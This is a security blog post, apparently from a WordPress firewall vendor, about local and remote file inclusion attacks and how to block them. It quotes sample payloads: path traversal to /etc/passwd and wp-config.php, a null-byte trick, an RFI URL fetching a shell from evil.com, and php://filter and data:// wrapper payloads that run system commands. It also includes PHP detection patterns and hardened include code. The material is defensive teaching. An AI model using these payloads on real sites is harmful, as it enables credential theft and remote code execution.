Protecting WordPress from File Inclusion Attacks (LFI/RFI)

File inclusion attacks let hackers read sensitive files or execute malicious code. Learn how LFI and RFI attacks work and how to protect your WordPress site.

Sarah Chen

Understanding File Inclusion Attacks

File inclusion vulnerabilities allow attackers to include files on your server that shouldn't be accessible, or worse, include remote files from attacker-controlled servers. These attacks can expose your wp-config.php (revealing database credentials), read system files like /etc/passwd, or execute malicious PHP code—potentially leading to complete server compromise.

Local File Inclusion (LFI)

LFI attacks trick the server into including local files that shouldn't be accessible through the web application.

How LFI Works

Consider a vulnerable plugin with code like:

include($_GET['page'] . ".php");

Normal use: ?page=home includes home.php

Attack: ?page=../../../wp-config includes your config file

Path Traversal

The ../ sequence moves up one directory. By chaining enough of them, attackers can reach any file the web server's PHP process is permitted to read:

  • ../../../../etc/passwd - Linux user list
  • ../../../wp-config.php - Database credentials
  • ../../.htaccess - Server configuration

Null Byte Injection

On PHP versions before 5.3.4, a URL-encoded null byte (%00) terminated the path string at the C level, so the include path ended at the attacker's value:

?page=../../../etc/passwd%00

Everything after the null byte, including the .php extension appended by the code, was ignored. Current PHP versions reject include paths that contain a null byte, so this trick only matters on unpatched legacy hosts.

Remote File Inclusion (RFI)

RFI attacks include files from external servers, typically containing malicious PHP code.

How RFI Works

With the same vulnerable code, if allow_url_include is enabled (it has been Off by default since the setting was introduced in PHP 5.2):

?page=http://evil.com/shell

PHP appends the .php suffix, fetches http://evil.com/shell.php from the attacker's server and executes its contents on your server.

PHP Wrapper Attacks

PHP stream wrappers provide additional attack vectors:

  • php://filter/convert.base64-encode/resource=wp-config.php - Reads files as base64
  • php://input - Reads POST body as code
  • data://text/plain,<?php system($_GET['cmd'])?> - Executes inline code

Note that php://filter works even when allow_url_include is Off, because it is a local stream wrapper; it is the usual way to read source files (such as wp-config.php) without the PHP interpreter executing them. php://input and data:// require allow_url_include = On to be usable with include().

Real-World WordPress Vulnerabilities

File inclusion vulnerabilities have affected many WordPress plugins:

  • Slider Revolution (2014) - Massive LFI vulnerability affecting millions of sites
  • TimThumb - RFI vulnerability in image processing
  • Various theme downloaders - Often vulnerable to path traversal

How WP Folder Shield Protects Against File Inclusion

Path Traversal Detection

The firewall blocks requests containing:

  • ../ and ..\ sequences
  • URL-encoded variants (%2e%2e%2f)
  • Double-encoded attempts
  • Unicode encoding tricks

Sensitive File Protection

Blocks direct access attempts to:

  • wp-config.php
  • .htaccess files
  • wp-includes files
  • Debug logs
  • Backup files (.sql, .bak, .old)

PHP Wrapper Blocking

Detects and blocks malicious PHP wrappers:

  • php://filter
  • php://input
  • data:// protocol
  • expect:// (if enabled)
  • zip:// and phar:// exploits

Remote URL Blocking

Blocks attempts to include remote files:

  • http:// and https:// in include paths
  • ftp:// protocol
  • External domain references in vulnerable parameters
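The three detection lists above (path traversal, PHP wrappers, remote URLs) can be illustrated with one small request inspector. This is an added example written for this article, not WP Folder Shield's own code; the function names, the decode-pass limit and the sample values are assumptions constructed for illustration.

```php
<?php
// Added example, not WP Folder Shield's code: normalise a request parameter
// and report the traversal, wrapper, remote-URL and sensitive-file patterns
// described above. Names and constants are assumptions for illustration.
declare(strict_types=1);

const MAX_DECODE_PASSES = 3; // enough to unwrap single- and double-encoded payloads

/**
 * Percent-decode repeatedly until the value stops changing, so that
 * "%252e%252e%252f" (double-encoded) and "%2e%2e%2f" both become "../".
 * Overlong UTF-8 forms of '.', '/' and '\' (e.g. %c0%ae) are folded back to
 * ASCII as well, which is the "Unicode encoding trick" the firewall looks for.
 */
function fully_decode(string $value): string
{
    for ($i = 0; $i < MAX_DECODE_PASSES; $i++) {
        $decoded = rawurldecode($value);
        if ($decoded === $value) {
            break;
        }
        $value = $decoded;
    }
    return str_replace(["\xC0\xAE", "\xC0\xAF", "\xC1\x9C"], ['.', '/', '\\'], $value);
}

/** Returns the list of reasons a value looks like a file-inclusion attempt; empty if clean. */
function inspect_value(string $raw): array
{
    $value   = fully_decode($raw);
    $reasons = [];

    if (preg_match('#\.\.[/\\\\]#', $value)) {          // ../ or ..\
        $reasons[] = 'path traversal';
    }
    if (strpos($value, "\0") !== false) {               // null-byte truncation
        $reasons[] = 'null byte';
    }
    if (preg_match('#^\s*(?:php|expect|zip|phar|glob)://|^\s*data:#i', $value)) {
        $reasons[] = 'php wrapper';
    }
    if (preg_match('#^\s*(?:https?|ftps?)://#i', $value)) {
        $reasons[] = 'remote url';
    }
    if (preg_match('#wp-config\.php|\.htaccess|debug\.log|\.(?:sql|bak|old)$#i', $value)) {
        $reasons[] = 'sensitive file';
    }
    return $reasons;
}

/** Scan every string parameter of a request; returns only the flagged ones. */
function scan_request(array $params): array
{
    $flagged = [];
    foreach ($params as $name => $value) {
        if (!is_string($value)) {
            continue;
        }
        $reasons = inspect_value($value);
        if ($reasons !== []) {
            $flagged[$name] = $reasons;
        }
    }
    return $flagged;
}

// Constructed sample values (not captured traffic), one per rule family.
$samples = [
    'plain page name'          => 'home',
    'plain traversal'          => '../../../wp-config',
    'url-encoded traversal'    => '%2e%2e%2f%2e%2e%2fetc%2fpasswd',
    'double-encoded traversal' => '%252e%252e%252f%252e%252e%252fetc%252fpasswd',
    'overlong utf-8 traversal' => '..%c0%af..%c0%afetc/passwd',
    'null byte'                => '../../../etc/passwd%00',
    'php://filter wrapper'     => 'php://filter/convert.base64-encode/resource=wp-config.php',
    'data: wrapper'            => 'data:text/plain,hello',
    'remote url'               => 'http://evil.com/shell',
];

foreach ($samples as $label => $value) {
    $reasons = inspect_value($value);
    printf("%-26s %s\n", $label, $reasons === [] ? 'allowed' : 'blocked: ' . implode(', ', $reasons));
}
```

In a real plugin you would call scan_request() on the merged $_GET and $_POST arrays and additionally on $_SERVER['QUERY_STRING'], because PHP has already percent-decoded $_GET once, so a single-encoded payload only shows up in its raw form in the query string. Blocking on the decoded form rather than the raw bytes is what makes the double-encoding and overlong-UTF-8 variants fall into the same rule as a plain ../.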

Server-Level Protections

Beyond the firewall, these PHP settings help:

php.ini Settings

allow_url_fopen = Off    ; Prevents remote file operations
allow_url_include = Off  ; Blocks remote file inclusion
open_basedir = /var/www/ ; Restricts file access to web directory

Two caveats: allow_url_fopen = Off also disables legitimate remote reads through file_get_contents() and other stream functions, so test plugins that fetch remote content after changing it; and open_basedir must list every directory PHP needs at runtime (the site root and, as a further colon-separated path, the upload temp directory), otherwise file uploads fail with an open_basedir warning.

.htaccess Rules

WP Folder Shield's directory protection adds .htaccess rules that block PHP execution in uploads and other sensitive directories, limiting the impact of successful attacks.

Best Practices for Prevention

For Site Owners

  • Keep all plugins and themes updated
  • Remove unused plugins and themes
  • Use a WAF like WP Folder Shield
  • Ensure directory protection is enabled
  • Use reputable plugins from trusted developers

For Developers

  • Never use user input directly in include/require
  • Use a whitelist of allowed files
  • Validate and sanitize all input
  • Disable allow_url_include
  • Use realpath() to resolve paths and validate them
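The developer rules above, as an added example that is not part of the article: the vulnerable include from the LFI section next to two hardened versions, one using an allow-list (the preferred form) and one using realpath() containment for a template directory whose contents change. The function names, the ALLOWED_PAGES map and the pages/ directory layout are assumptions for illustration.

```php
<?php
// Added example, not from the article or WP Folder Shield: vulnerable include
// beside two hardened resolvers. Names and paths are assumptions.
declare(strict_types=1);

// --- Vulnerable (kept for comparison only): the request value becomes the path. ---
function load_page_vulnerable(string $page): void
{
    // ?page=../../../wp-config or ?page=php://filter/... goes straight into include().
    include($page . ".php");
}

// --- Hardened 1: allow-list. The request value is only ever a map key, never a path. ---
const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page_allowlist(string $page): ?string
{
    // Unknown keys (anything containing '/', '..', ':' and so on) yield null.
    return ALLOWED_PAGES[$page] ?? null;
}

// --- Hardened 2: realpath() containment, when templates are discovered at runtime. ---
function resolve_page_realpath(string $page, string $templateDir): ?string
{
    // Reject anything that is not a plain identifier before touching the filesystem,
    // which already rules out traversal sequences, wrappers and null bytes.
    if (!preg_match('/^[a-z0-9_-]{1,64}$/', $page)) {
        return null;
    }
    $base   = realpath($templateDir);
    $target = realpath($templateDir . DIRECTORY_SEPARATOR . $page . '.php');
    // realpath() returns false for missing files and resolves symlinks, so a
    // template that is a symlink to somewhere outside $templateDir is caught
    // by the prefix check below.
    if ($base === false || $target === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// Usage with the allow-list; templates assumed to live in __DIR__ . '/pages'.
$templateDir = __DIR__ . DIRECTORY_SEPARATOR . 'pages';
$page = isset($_GET['page']) ? (string) $_GET['page'] : 'home';

$file = resolve_page_allowlist($page);
if ($file === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $templateDir . DIRECTORY_SEPARATOR . $file;
```

The allow-list version is the stronger of the two because the user-controlled string never reaches a filesystem call at all; the realpath() version is the fallback when the set of templates cannot be enumerated in code, and its identifier regex does most of the work before realpath() adds a second line of defence against symlinks. Either way, keep allow_url_include off so that a regression in one plugin cannot turn into remote code execution.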

Conclusion

File inclusion attacks remain a serious threat to WordPress sites, capable of exposing sensitive data or enabling remote code execution. WP Folder Shield's firewall provides comprehensive protection by blocking path traversal, PHP wrappers, and remote file inclusion attempts. Combined with directory protection that prevents PHP execution in vulnerable locations, your site gains multiple layers of defense against these dangerous attacks.

Written by Sarah Chen

WP Folder Shield Team
